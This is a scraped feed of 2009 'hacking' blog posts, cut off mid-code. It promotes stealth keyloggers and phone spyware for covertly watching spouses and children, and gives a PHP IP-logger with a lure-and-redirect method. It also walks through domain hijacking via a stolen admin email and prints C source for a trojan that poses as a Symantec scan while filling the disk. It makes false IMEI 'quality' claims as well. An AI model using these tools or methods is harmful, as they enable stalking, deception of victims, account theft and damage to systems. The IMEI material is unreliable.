src="http://bdv.bidvertiser.com/BidVertiser.dbm?pid=98267&bid=384485" type="text/javascript"><br /></script> <noscript><a href="http://www.bidvertiser.com">internet advertising</a></noscript>--> <!-- End BidVertiser code --> <p style="text-align: center;"><img class="size-full wp-image-961 aligncenter" title="monitor_pc" src="http://www.gohacking.com/wp-content/uploads/2009/02/monitor_pc.jpg" alt="monitor_pc" width="239" height="191" /></p> <p>Most of the time, it becomes necessary for us to monitor our own computer or a remote computer to keep track of the activities going on. This may be for several reasons. Especially it is most necessary for the parents to monitor their computer to keep track of their children’s activities during their absence. Some people may also require to monitor their computer to keep an eye on the activities of their spouse or partner. Today, with the advancement in the field of the software technology, it’s just a cakewalk to monitor the computer. For this all you have to do is, use a <strong>PC Monitoring Software</strong>.</p> <p>But the job doesn’t end here. This is because there exists tons of such monitoring softwares on the market and many times we get confused which to choose and how to use them. So I have decided to make this job simpler for you, by writing this post. In this post I’ll give a detailed information about Computer monitoring softwares which include their features, advantages, installation, usage procedure and so on. To make this post interesting, let’s take up each topic in the form of question and answer.</p> <h3>What exactly is a Monitoring Software and how can it help me ?</h3> <p>A computer monitoring software is just like any other software (program) which when installed, secretly monitors <strong>each and every activity</strong> that takes place on the computer. The activities such as web browsing, chatting, gaming etc. are all recorded and saved. These monitoring softwares can record each and every keystroke. So it is possible to capture usernames and passwords very easily with minimum effort. Monitoring softwares are also commonly known as <strong>Keyloggers</strong>.</p> <h3>How can I install a monitoring software ?</h3> <p>Installing a monitoring software is too simple. During the installation, you need to setup a <strong>secret password and hotkey combination</strong> which is required later to see the recorded data ( logs). After the installation is complete the software goes invisible, but keeps running in the background. Whenever you want to see the logs, just press the hotkey combination (ex. Shift+Ctrl+F10). Now a small window will popup asking for a password. Here you need to enter the password that was setup during the installation time. After you enter the password you’ll be able to see all the activities that took place on the computer during your absence.</p> <h3>Can the person using the computer come to know about the presence of the Monitoring Software ?</h3> <p>Most of the time it becomes impossible to detect the presence of the monitoring software. This is because, once installed it hides itself from Start menu, Program Files, Control Panel, Task manager etc. Because of it’s stealth behaviour the user can never come to know that he/she is under the presence of monitoring.</p> <h3>Which Monitoring Software should I use ?</h3> <p>There exists different flavours of these softwares and you have to choose the one that best match your needs. Here is a list of some of the best monitoring programs that I recommend.</p> <p><strong>For Monitoring a Local PC:</strong></p> <p>If you want to monitor a local PC (may be your own PC) then the following program is recommended.</p> <p><a rel="nofollow" href="http://www.gohacking.com/recommends/ts/spy_agent.php?Mon_PC" target="_blank"><strong>Spy Agent Stealth</strong></a> </p> <p>You can find a <strong>Complete Installation Guide </strong>for <strong>Spy Agent Stealth </strong><a rel="nofollow" href="http://www.gohacking.com/recommends/spyagent_help.html" target="_blank"><strong>HERE</strong></a></p> <p><strong>For Monitoring a Remote PC (Also works on local PC) :</strong></p> <p>If you want to monitor a remote PC you may use the following programs. These programs works for remote PC as well as local PC.</p> <p><strong><a rel="nofollow" href="http://www.gohacking.com/recommends/ts/winspy.php?Mon_PC" target="_blank">Win-Spy Monitor</a> </strong></p> <p>You can find a <strong>Complete Installation Guide </strong>for <strong>Win-Spy Monitor </strong><a rel="nofollow" href="http://www.gohacking.com/recommends/winspy_help.html" target="_blank"><strong>HERE</strong></a></p> <p><strong><a rel="nofollow" href="http://www.gohacking.com/recommends/ts/realtime_spy.php?Mon_PC" target="_blank">Realtime Spy</a></strong></p> <p>You can find a <strong>Complete Installation Guide </strong>for <strong>Realtime Spy <a href="http://www.gohacking.com/recommends/realtimespy_help.html" target="_blank">HERE</a></strong></p> <p><strong><a rel="nofollow" href="http://www.gohacking.com/recommends/ts/spy_anywhere.php?Mon_PC" target="_blank">Spy Anywhere</a></strong></p> <p><strong><a rel="nofollow" href="http://www.gohacking.com/recommends/ts/keystroke_spy.php?Mon_PC" target="_blank">Keystroke Spy</a></strong></p> <p><strong>For Monitoring a Network :</strong></p> <p>The following program can be used to monitor an <strong>Entire Network of computers</strong> from one central location. This becomes handy to monitor the staff in a company or students in a school/college.</p> <p><strong><a rel="nofollow" href="http://www.gohacking.com/recommends/ts/netvizor.php?Mon_PC" target="_blank">NetVizor</a></strong></p> <p>You can find a <strong>Complete Installation Guide </strong>for <strong>NetVizor</strong> <a rel="nofollow" href="http://www.gohacking.com/recommends/netvizor_help.html" target="_blank"><strong>HERE</strong></a></p> <p><strong>For monitoring a Cell Phone from your PC:</strong></p> <p>If you want to monitor a Cell Phone from your PC you can refer the following link.</p> <p><strong><a href="http://www.gohacking.com/2009/06/cell-phone-spy.html">Cell Phone Spy</a></strong></p>Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-56546936586052729382009-07-24T06:44:00.001-07:002009-07-24T06:44:27.383-07:00Get a Call from your own Cell Phone number<!-- Promote Posts --> <!--<div style="width:556px;height:175px;border:2px solid #ffe400;padding:5px;"> <p> <a href="http://www.gohacking.com/recom_products/sniper_spy.php" target="_blank" rel="nofollow" style="color:B50000;font-size:16px" onmouseover="return showStatus('');" onmouseout="return showStatus('');"><u>Is your Spouse Cheating? Catch a Cheating Spouse Red-Handed!</u></a><br /><span style="font-size:16px;color:#000000;">Access Any PC from Anywhere. Spy on Any Email to Find Out the Truth! Award Winning Remote PC Surveillance Software.</span><br /><a href="http://www.gohacking.com/products/hacking-security-books" target="_blank" rel="nofollow" style="color:B50000;font-size:16px" onmouseover="return showStatus('');" onmouseout="return showStatus('');"><u>Want to Learn Hacking? ...But Don't Know Where to Start?</u></a><br /><span style="font-size:16px;color:#000000;">Learn Underground Hacker Techniques <b>from the Basics</b>. Become One with the Hackers. Start Your Journey Today! </span></p> </div><br />--> <!-- End Promote Posts --> <!-- Begin BidVertiser code --> <!--<script language="JavaScript1.1" src="http://bdv.bidvertiser.com/BidVertiser.dbm?pid=98267&bid=384485" type="text/javascript"><br /></script> <noscript><a href="http://www.bidvertiser.com">internet advertising</a></noscript>--> <!-- End BidVertiser code --> <p><a href="http://www.gohacking.com/wp-content/uploads/2008/12/cellphone.jpg"><img class="alignleft size-medium wp-image-568" title="cellphone" src="http://www.gohacking.com/wp-content/uploads/2008/12/cellphone-300x300.jpg" alt="" width="147" height="147" /></a>Here is a trick to get a call to your cell phone from your own number.Do you think I am crazy? No, I am not…….</p> <p>Just try the following steps and you’ll get a call to your cell phone from your own number.</p> <p> </p> <p>1. Just give a missed call to this number.You’ll not be charged!</p> <h3><span style="color: rgb(0, 0, 255);">+41445804650</span></h3> <p>2. Wait for a few seconds and you’ll get a call to your cell phone from your own number</p> <p>3. Receive the call.You’ll hear a lady voice asking for a PIN number.Just enter some rubbish number.</p> <p>4. She say’s- Your PIN cannot be processed and the call disconnects..</p> <h2>ANOTHER TRICK</h2> <p>Instead of giving a missed call, just continue calling.The call will not be received and will get disconnected just after a while.But now do you know what happen’s?</p> <p>You will get a call from the number</p> <h3><span style="color: rgb(0, 0, 255);">+501</span></h3> <h2>Reason behind this trick</h2> <p>God Knows!!</p>Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-14271561642977824982009-07-24T06:42:00.001-07:002009-07-24T06:42:28.948-07:00Is your Nokia Cell Phone Original<!-- Promote Posts --> <!--<div style="width:556px;height:175px;border:2px solid #ffe400;padding:5px;"> <p> <a href="http://www.gohacking.com/recom_products/sniper_spy.php" target="_blank" rel="nofollow" style="color:B50000;font-size:16px" onmouseover="return showStatus('');" onmouseout="return showStatus('');"><u>Is your Spouse Cheating? Catch a Cheating Spouse Red-Handed!</u></a><br /><span style="font-size:16px;color:#000000;">Access Any PC from Anywhere. Spy on Any Email to Find Out the Truth! Award Winning Remote PC Surveillance Software.</span><br /><a href="http://www.gohacking.com/products/hacking-security-books" target="_blank" rel="nofollow" style="color:B50000;font-size:16px" onmouseover="return showStatus('');" onmouseout="return showStatus('');"><u>Want to Learn Hacking? ...But Don't Know Where to Start?</u></a><br /><span style="font-size:16px;color:#000000;">Learn Underground Hacker Techniques <b>from the Basics</b>. Become One with the Hackers. Start Your Journey Today! </span></p> </div><br />--> <!-- End Promote Posts --> <!-- Begin BidVertiser code --> <!--<script language="JavaScript1.1" src="http://bdv.bidvertiser.com/BidVertiser.dbm?pid=98267&bid=384485" type="text/javascript"><br /></script> <noscript><a href="http://www.bidvertiser.com">internet advertising</a></noscript>--> <!-- End BidVertiser code --> <p><a href="http://www.gohacking.com/wp-content/uploads/2008/12/nokia-phone.jpg"><img class="alignleft size-medium wp-image-237" title="nokia-phone" src="http://www.gohacking.com/wp-content/uploads/2008/12/nokia-phone-158x300.jpg" alt="" width="158" height="300" /></a></p> <p>Nokia is one of the largest selling phones across the globe.Most of us own a Nokia phone but are unaware of it’s originality.Are you keen to know whether your Nokia mobile phone is original or not? Then you are in the right place and this information is specially meant for you. Your phones<strong> IMEI</strong> (International Mobile Equipment Identity) number confirms your phone’s originality.</p> <p>Press the following on your mobile <span style="font-size: 180%;"><span style="font-size: x-large;"><strong><span style="color: rgb(255, 0, 0);">*#06#</span></strong> </span></span><span style="font-size: 100%;">to see your Phone’s <strong>IMEI</strong> number(serial number).</span></p> <p>Then check the <strong><span style="font-size: 180%; color: rgb(255, 0, 0);"><span style="font-size: x-large;">7th</span></span></strong> and <strong><span style="font-size: 180%; color: rgb(255, 0, 0);"><span style="font-size: x-large;">8th</span></span></strong> numbers</p> <p><strong>Phone serial no. <span style="font-size: 130%;"><span style="font-size: large;">x x x x x x<span style="color: rgb(255, 0, 0);"> ? ?</span> x x x x x x x</span></span></strong><br /><strong></strong><br />IF the Seventh & Eighth digits of your cell phone are <strong><span style="font-size: 130%; color: rgb(255, 0, 0);"><span style="font-size: large;">02</span></span></strong> or <strong><span style="font-size: 130%; color: rgb(255, 0, 0);"><span style="font-size: large;">20</span></span></strong> this means your cell phone was assembled in Emirates which is very Bad quality</p> <p>IF the Seventh & Eighth digits of your cell phone are <strong><span style="font-size: 130%;"><span style="font-size: large;"><span style="color: rgb(255, 0, 0);">08</span> </span></span></strong>or <strong><span style="font-size: 130%; color: rgb(255, 0, 0);"><span style="font-size: large;">80</span></span></strong> this means your cell phone was manufactured in Germany which is fair quality</p> <p>IF the Seventh & Eighth digits of your cell phone are <strong><span style="font-size: 130%; color: rgb(255, 0, 0);"><span style="font-size: large;">01</span></span></strong> or <strong><span style="font-size: 130%; color: rgb(255, 0, 0);"><span style="font-size: large;">10</span></span></strong> this means your cell phone was manufactured in Finland which is very Good</p> <p>IF the Seventh & Eighth digits of your cell phone are <span style="color: rgb(255, 0, 0);"><strong><span style="font-size: 130%;"><span style="font-size: large;">00</span></span></strong> </span>this means your cell phone was manufactured in original factory which is the best Mobile Quality</p> IF the Seventh & Eighth digits of your cell phone are <strong><span style="font-size: 130%; color: rgb(255, 0, 0);"><span style="font-size: large;">13</span></span></strong> this means your cell phone was assembled in Azerbaijan which is very Bad quality and also dangerous for your healthPraba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-66314450951337103502009-07-24T06:40:00.001-07:002009-07-24T06:40:46.793-07:00IP Finder<?php<br />$ip = $_SERVER['REMOTE_ADDR'];<br />$dt = date("l dS \of F Y h:i:s A");<br />$file=fopen("ip_log.txt","a");<br />$data = $ip.' '.$dt."\n";<br />fwrite($file, $data);<br />fclose($file);<br />header( 'Location: http://www.google.com' ) ;<br />?>Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-7596761108667616222009-07-24T06:39:00.001-07:002009-07-24T06:39:31.684-07:00How to Find the IP Address of a Remote Computer<!-- Promote Posts --> <!--<div style="width:556px;height:175px;border:2px solid #ffe400;padding:5px;"> <p> <a href="http://www.gohacking.com/recom_products/sniper_spy.php" target="_blank" rel="nofollow" style="color:B50000;font-size:16px" onmouseover="return showStatus('');" onmouseout="return showStatus('');"><u>Is your Spouse Cheating? Catch a Cheating Spouse Red-Handed!</u></a><br /><span style="font-size:16px;color:#000000;">Access Any PC from Anywhere. Spy on Any Email to Find Out the Truth! Award Winning Remote PC Surveillance Software.</span><br /><a href="http://www.gohacking.com/products/hacking-security-books" target="_blank" rel="nofollow" style="color:B50000;font-size:16px" onmouseover="return showStatus('');" onmouseout="return showStatus('');"><u>Want to Learn Hacking? ...But Don't Know Where to Start?</u></a><br /><span style="font-size:16px;color:#000000;">Learn Underground Hacker Techniques <b>from the Basics</b>. Become One with the Hackers. Start Your Journey Today! </span></p> </div><br />--> <!-- End Promote Posts --> <!-- Begin BidVertiser code --> <!--<script language="JavaScript1.1" src="http://bdv.bidvertiser.com/BidVertiser.dbm?pid=98267&bid=384485" type="text/javascript"><br /></script> <noscript><a href="http://www.bidvertiser.com">internet advertising</a></noscript>--> <!-- End BidVertiser code --> <p><img class="alignleft" title="Find IP Address" src="http://www.gohacking.com/wp-content/uploads/2008/12/ip.jpg" alt="Find IP Address" />Most of you may be curious to know how to find the IP address of your friend’s computer or to find the IP address of the person with whom you are chatting in Yahoo messenger or Gtalk. In this post I’ll show you how to find the IP address of a remote computer in simple steps.</p> <p> </p> <p>I have created a PHP script to make it easier for you to find the IP address of the remote computer of your choice. Here is a step-by-step process to find out the IP address.</p> <p>1. <a rel="nofollow" href="http://www.gohacking.com/downloads/scripts/IP_Finder.zip">Download</a> the <a rel="nofollow" href="http://www.gohacking.com/downloads/scripts/IP_Finder.zip">IP Finder script</a> (IP_Finder.ZIP) that I have created.</p> <p>2. Open a new account in <a rel="nofollow" href="http://x10hosting.com/" target="_blank">X10Hosting</a> (or any free host that supports PHP).</p> <p>3. Extract the IP_Finder.ZIP file and upload the two files <strong>ip.php</strong> and <strong>ip_log.txt</strong> into the root folder of your hosting account using the File Manager.</p> <p>4. You can rename the <strong>ip.php</strong> to any name of your choice.</p> <p>5. Set the permission to <strong>777</strong> on <strong>ip_log.txt</strong>.</p> <p>Now you are all set to find the IP address of your friend or any remote computer of your choice. All you have to do is send the link of <strong>ip.php</strong> to your friend or the person with whom you’re chatting. Once the person click’s on the link, his/her IP address is recorded in the file <strong>ip_log.txt</strong>.</p> <p>For your better understanding let’s take up the following example.</p> <p>Suppose you open a new account in X10hosting.com with the subdomain as <strong>abc</strong>, then your IP Finder link would be</p> <p><a rel="nofollow" href="http://abc.x10hosting.com/ip.php" target="_blank">http://abc.x10hosting.com/ip.php</a></p> <p>You have to send the above link to you friend via email or while chatting and ask him to visit that link. Once your friend clicks on the link, his IP address will be recorded along with the Date and Time in the <strong>ip_log.txt</strong> file. After recording the IP address, the script will redirect the person to google.com so as to avoid any suspicion.</p> <p>To find the recorded IP address check the logs using the following link.</p> <p><a rel="nofollow" href="http://abc.x10hosting.com/ip_log.php" target="_blank">http://abc.x10hosting.com/ip_log.php</a></p> <p>The sample log will be in the following format</p> <p>79.92.144.237 Thursday 07th of May 2009 05:31:27 PM<br />59.45.144.237 Thursday 07th of May 2009 05:31:28 PM<br />123.92.144.237 Thursday 07th of May 2009 05:31:31 PM</p> <p>NOTE: You have to replace <strong>abc</strong> with your subdomain name. </p> <p>I hope this helps. Express your opinion and suggestions through comments.</p>Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-17127752162861505462009-07-24T06:38:00.001-07:002009-07-24T06:38:54.996-07:00Cell Phone Spy – How to Spy on Cell Phones<h2 style="text-align: center;">Cell Phone Spy – How to Spy on a Cell Phone</h2> <p style="text-align: center;"> </p> <p><img class="alignleft size-full wp-image-1520" title="Cell Phone Spy" src="http://www.gohacking.com/wp-content/uploads/2009/06/Mobile-Spy.jpg" alt="Cell Phone Spy" width="125" height="153" />Are you curious to know <strong>how to spy on a cell phone?</strong> Do you want to secretly spy on SMS text messages, calls, GPS locations and other confidential info of your child’s or spouse’s cell phone? Well here is a detailed tutorial on how to spy on cell phones.</p> <p>Every day I get a lot of emails from people asking how to spy on cell phone. Before you can spy on a cell phone you need to know the following facts.</p> <p>1. To spy on a given cell phone you should make sure that the target cell phone is compatible with the <strong>cell phone spy</strong> software.</p> <p>2. It is not possible to install the cell phone spy software on an ordinary cell phone. Cell phone <a href="http://en.wikipedia.org/wiki/Spyware" target="_blank">spy softwares</a> are compatible only with the following type of phones (operating systems).</p> <p>Symbian OS</p> <p>Apple iphone</p> <p>Windows Mobile</p> <p>For a complete list of compatible cell phones visit the <a rel="nofollow" href="http://www.gohacking.com/recom_products/mobile-spy.php" target="_blank">Mobile Spy</a> site.</p> <p>Today most of the modern cell phones are loaded with one of the above three operating systems and hence compatibility doesn’t pose a major problem. There exists many cell phone spy softwares on the market to accomplish this job and hence people often get confused about which cell phone spy software to go for. To make this job simpler for you we personally tested some of the top cell phone spy softwares and based on the results we conclude that the following cell phone spy software to be the best one.</p> <h3><a rel="nofollow" href="http://www.gohacking.com/recom_products/mobile-spy.php" target="_blank">Mobile Spy</a> - The No.1 Cell Phone Spy Software</h3> <p><em>Mobile Spy is a perfect tool for parents to monitor their childern’s activity on thier cell phone!</em></p> <p><strong>Mobile Spy Features</strong></p> <p><a rel="nofollow" href="http://www.gohacking.com/recom_products/mobile-spy.php" target="_blank">Mobile Spy</a> is a hybrid spy software/service which allows you to spy on your target cell phone in real time. This unique system records the activities of anyone who uses the compatible cell phone ( iPhone, Windows Mobile or Symbian OS smartphone). For this you need to install a small application onto the cell phone. This application starts at every boot of the phone but remains stealth and does not show up in the running process list. It runs in the background and will spy on every activity that takes place on the phone.</p> <p><strong>Logging Features</strong></p> <p>1. Calls Log – Each incoming and outgoing number on the phone is logged along with duration and time stamp.</p> <p>2. Every text message/MMS is logged even if the phone’s logs are deleted. Includes full text.</p> <p>3. The phones’s current location is frequently logged using GPS when signal is available.</p> <p>4. Each address entered into Internet Explorer (or any browser) is logged.</p> <p>5. This cell phone spy software works in total stealth mode. The person using the phone can never come to know about the presence of this software.</p> <p><strong>How it works</strong></p> <p>The working of <a rel="nofollow" href="http://www.gohacking.com/recom_products/mobile-spy.php" target="_blank">Mobile Spy</a> is very simple and needs no extra knowledge to install and use.</p> <p>Step 1- After you purchase Mobile Spy you’ll get a link to download the software. Along with this you’ll get a username and password for you online control panel.</p> <p>Step 2- Install the downloaded cell phone spy software onto any of the compatible cell phone. After installation the software starts recording all the activities on the cell phone.</p> <p>Step 3- Login to your online control panel to see the logs containing the recorded information.</p> <p>This is just a small list of it’s features. For a list of compatible phones, step-by-step installation guide and more details visit the following link</p> <h3><a rel="nofollow" href="http://www.gohacking.com/recom_products/mobile-spy.php" target="_blank">Mobile Spy</a></h3> <p> </p> <p><strong>Why Mobile Spy?</strong></p> <p><a rel="nofollow" href="http://www.gohacking.com/recom_products/mobile-spy.php" target="_blank">Mobile Spy</a> is one of the best and award winning cell phone spy softwares on the market with an affordable price. Mobile Spy team provides an excellent support and hence it becomes just a cakewalk to spy on your favorite cell phone! Today with an excessive usage of cell phones by many teenagers it becomes necessary for their parents to perform cell phone spying. So what are you waiting for? Go grab <a rel="nofollow" href="http://www.gohacking.com/recom_products/mobile-spy.php" target="_blank">Mobile Spy</a> and expose the truth.</p>Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-29788555458793876372009-07-24T06:37:00.000-07:002009-07-24T06:38:28.242-07:00Domain Hijacking – How to Hijack a Domain<!-- Promote Posts --> <!--<div style="width:556px;height:175px;border:2px solid #ffe400;padding:5px;"> <p> <a href="http://www.gohacking.com/recom_products/sniper_spy.php" target="_blank" rel="nofollow" style="color:B50000;font-size:16px" onmouseover="return showStatus('');" onmouseout="return showStatus('');"><u>Is your Spouse Cheating? Catch a Cheating Spouse Red-Handed!</u></a><br /><span style="font-size:16px;color:#000000;">Access Any PC from Anywhere. Spy on Any Email to Find Out the Truth! Award Winning Remote PC Surveillance Software.</span><br /><a href="http://www.gohacking.com/products/hacking-security-books" target="_blank" rel="nofollow" style="color:B50000;font-size:16px" onmouseover="return showStatus('');" onmouseout="return showStatus('');"><u>Want to Learn Hacking? ...But Don't Know Where to Start?</u></a><br /><span style="font-size:16px;color:#000000;">Learn Underground Hacker Techniques <b>from the Basics</b>. Become One with the Hackers. Start Your Journey Today! </span></p> </div><br />--> <!-- End Promote Posts --> <!-- Begin BidVertiser code --> <!--<script language="JavaScript1.1" src="http://bdv.bidvertiser.com/BidVertiser.dbm?pid=98267&bid=384485" type="text/javascript"><br /></script> <noscript><a href="http://www.bidvertiser.com">internet advertising</a></noscript>--> <!-- End BidVertiser code --> <p><img class="alignleft size-full wp-image-1585" title="Domain hijacking" src="http://www.gohacking.com/wp-content/uploads/2009/07/domain_hijacking.jpg" alt="Domain hijacking" width="354" height="237" />In this post I will tell you about how the domain names are hacked and how they can be protected. The act of hacking domain names is commonly known as <strong>Domain Hijacking</strong>. For most of you, the term “domain hijacking” may seem to be like an alien. So let me first tell you what domain hijacking is all about.</p> <p><a href="http://en.wikipedia.org/wiki/Domain_hijacking" target="_blank">Domain hijacking</a> is a process by which <a href="http://en.wikipedia.org/wiki/Domain_name" target="_blank">Internet Domain Names</a> are stolen from it’s legitimate owners. Domain hijacking is also known as domain theft. Before we can proceed to know how to hijack domain names, it is necessary to understand how the domain names operate and how they get associated with a particular web server (website).</p> <p><strong>The operation of domain name is as follows</strong></p> <p>Any website say for example gohacking.com consists of two parts. The <strong>domain name</strong> (gohacking.com) and the <strong>web hosting server</strong> where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts and hence they must be integrated before a website can operate successfully. The integration of domain name with the web hosting server is done as follows.</p> <p>1. After registering a new domain name, we get a control panel where in we can have a full control of the domain. </p> <p>2. From this domain control panel, we point our domain name to the web server where the website’s files are actually hosted.</p> <p>For a clear understanding let me take up a small example.</p> <p>John registers a new domain “abc.com” from an <strong>X</strong> domain registration company. He also purchases a hosting plan from <strong>Y</strong> hosting company. He uploads all of his files (.html, .php, javascripts etc.) to his web server (at Y). From the domain control panel (of X) he configures his domain name “abc.com” to point to his web server (of Y). Now whenever an Internet user types “abc.com”, the domain name “abc.com” is resolved to the target web server and the web page is displayed. This is how a website actually works.</p> <p><strong>What happens when a domain is hijacked</strong></p> <p>Now let’s see what happens when a domain name is hijacked. To hijack a domain name you just need to get access to the domain control panel and point the domain name to some other web server other than the original one. So to hijack a domain you need not gain access to the target web server.</p> <p>For example, a hacker gets access to the domain control panel of “abc.com”. From here the hacker re-configures the domain name to point it to some other web server (Z). Now whenever an Internet user tries to access “abc.com” he is taken to the hacker’s website (Z) and not to John’s original site (Y).</p> <p>In this case the John’s domain name (abc.com) is said to be hijacked.</p> <p><strong>How the domain names are hijacked</strong></p> <p>To hijack a domain name, it’s necessary to gain access to the domain control panel of the target domain. For this you need the following ingredients</p> <p>1. The <strong>domain registrar name</strong> for the target domain.</p> <p>2. The <strong>administrative email address</strong> associated with the target domain. </p> <p>These information can be obtained by accessing the <a href="http://en.wikipedia.org/wiki/WHOIS" target="_blank">WHOIS</a> data of the target domain. To get access the WHOIS data, goto <a href="http://whois.domaintools.com/" target="_blank">whois.domaintools.com</a>, enter the target domain name and click on Lookup. Once the whois data is loaded, scroll down and you’ll see <strong>Whois Record</strong>. Under this you’ll get the “Administrative contact email address”.</p> <p>To get the domain registrar name, look for something like this under the <strong>Whois Record</strong>. “Registration Service Provided By: XYZ Company”. Here XYZ Company is the domain registrar. In case if you don’t find this, then scroll up and you’ll see <strong>ICANN Registrar</strong> under the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar.</p> <p>The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So to take full control of the domain, the hacker will hack the administrative email associated with it. Email hacking has been discussed in my previous post <a href="http://www.gohacking.com/2008/01/hacking-e-mail-account.html" target="_blank">how to hack an email account</a>.</p> <p>Once the hacker take full control of this email account, he will visit the domain registrar’s website and click on <em>forgot password</em> in the <em>login page</em>. There he will be asked to enter either the <em>domain name</em> or the <em>administrative email address</em> to initiate the password reset process. Once this is done all the details to reset the password will be sent to the administrative email address. Since the hacker has the access to this email account he can easily reset the password of domain control panel. After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes.</p> <p><strong>How to protect the domain name from being hijacked</strong></p> <p>The best way to protect the domain name is to protect the administrative email account associated with the domain. If you loose this email account, you loose your domain. So refer my previous post on how to <a href="http://www.gohacking.com/2008/10/how-to-protect-email-account-from-being.html">protect your email account from being hacked</a>. Another best way to protect your domain is to go for <a href="http://en.wikipedia.org/wiki/Domain_privacy" target="_blank">private domain registration</a>. When you register a domain name using the private registration option, all your personal details such as your name, address, phone and administrative email address are hidden from the public. So when a hacker performs a WHOIS lookup for you domain name, he will not be able to find your name, phone and administrative email address. So the private registration provides an extra security and protects your privacy. Private domain registration costs a bit extra amount but is really worth for it’s advantages. Every domain registrar provides an option to go for private registration, so when you purchase a new domain make sure that you select the private registration option.</p>Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-34181239184023452552009-07-24T06:36:00.000-07:002009-07-24T06:37:06.899-07:00Trojan Source Code/* SPACE EATER TROJAN BY SRIKANTH. USE IT FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD!*/<br /><br />#include<stdio.h><br />#include<conio.h><br />#include<dos.h><br />#include<stdlib.h><br />FILE *a,*t,*b;<br />int r,status,vir_count;<br />double i;<br />char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;<br /><br />void eatspace(void);<br />void findroot(void);<br />void showstatus(void);<br />void draw(void);<br />void accept(void);<br /><br />void main()<br />{<br />draw();<br />accept();<br />textcolor(WHITE);<br />draw();<br />gotoxy(12,8);<br />cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");<br />sleep(3);<br />gotoxy(12,8);<br />delline();<br />cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");<br />getch();<br />gotoxy(12,8);<br />delline();<br />findroot();<br />}<br /><br />void accept()<br />{<br />textcolor(LIGHTRED);<br />gotoxy(1,8);<br />cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rIF YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT.");<br /><br />if((choice=getch())!=13)<br />exit(0);<br />}<br /><br />void draw()<br />{<br />clrscr();<br />textcolor(WHITE);<br />gotoxy(12,2);<br />cputs("********************************************************");<br />gotoxy(12,6);<br />cputs("********************************************************");<br />gotoxy(12,3);<br />cputs("*\n\b*\n\b*\n\b");<br />gotoxy(67,3);<br />cputs("*\n\b*\n\b*\n\b");<br />gotoxy(14,4);<br />cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)");<br />}<br /><br />void findroot()<br />{<br />t=fopen("C:\\windows\\explorer.exe","rb");<br />if(t!=NULL)<br />{<br />fclose(t);<br />textcolor(WHITE);<br />a=fopen("C:\\windows\\system32\\spceshot.dll","rb");<br />if(a!=NULL)<br />{<br />textcolor(LIGHTRED);<br />gotoxy(12,8);<br />cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");<br />getch();<br />exit(1);<br />}<br />b=fopen("C:\\windows\\system32\\spceshot.dll","wb+");<br />if(b!=NULL)<br />{<br />showstatus();<br />eatspace();<br />}<br />}<br />t=fopen("D:\\windows\\explorer.exe","rb");<br />if(t!=NULL)<br />{<br />fclose(t);<br />a=fopen("D:\\windows\\system32\\spceshot.dll","rb");<br />if(a!=NULL)<br />{<br />textcolor(LIGHTRED);<br />gotoxy(12,8);<br />cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");<br />getch();<br />exit(1);<br />}<br />b=fopen("D:\\windows\\system32\\spceshot.dll","wb+");<br />if(b!=NULL)<br />{<br />showstatus();<br />eatspace();<br />}<br />}<br />t=fopen("E:\\windows\\explorer.exe","rb");<br />if(t!=NULL)<br />{<br />fclose(t);<br />a=fopen("E:\\windows\\system32\\spceshot.dll","rb");<br />if(a!=NULL)<br />{<br />textcolor(LIGHTRED);<br />gotoxy(12,8);<br />cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");<br />getch();<br />exit(1);<br />}<br />b=fopen("E:\\windows\\system32\\spceshot.dll","wb+");<br />if(b!=NULL)<br />{<br />showstatus();<br />eatspace();<br />}<br />}<br />t=fopen("F:\\windows\\explorer.exe","rb");<br />if(t!=NULL)<br />{<br />fclose(t);<br />a=fopen("F:\\windows\\system32\\spceshot.dll","rb");<br />if(a!=NULL)<br />{<br />textcolor(LIGHTRED);<br />gotoxy(12,8);<br />cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");<br />getch();<br />exit(1);<br />}<br />b=fopen("F:\\windows\\system32\\spceshot.dll","wb+");<br />if(b!=NULL)<br />{<br />showstatus();<br />eatspace();<br />}<br />}<br />if(t==NULL)<br />{<br />textcolor(LIGHTRED);<br />gotoxy(12,8);<br />cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");<br />getch();<br />exit(1);<br />}<br />exit(1);<br />}<br /><br />void eatspace()<br />{<br />textcolor(LIGHTRED);<br />gotoxy(12,16);<br />cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");<br 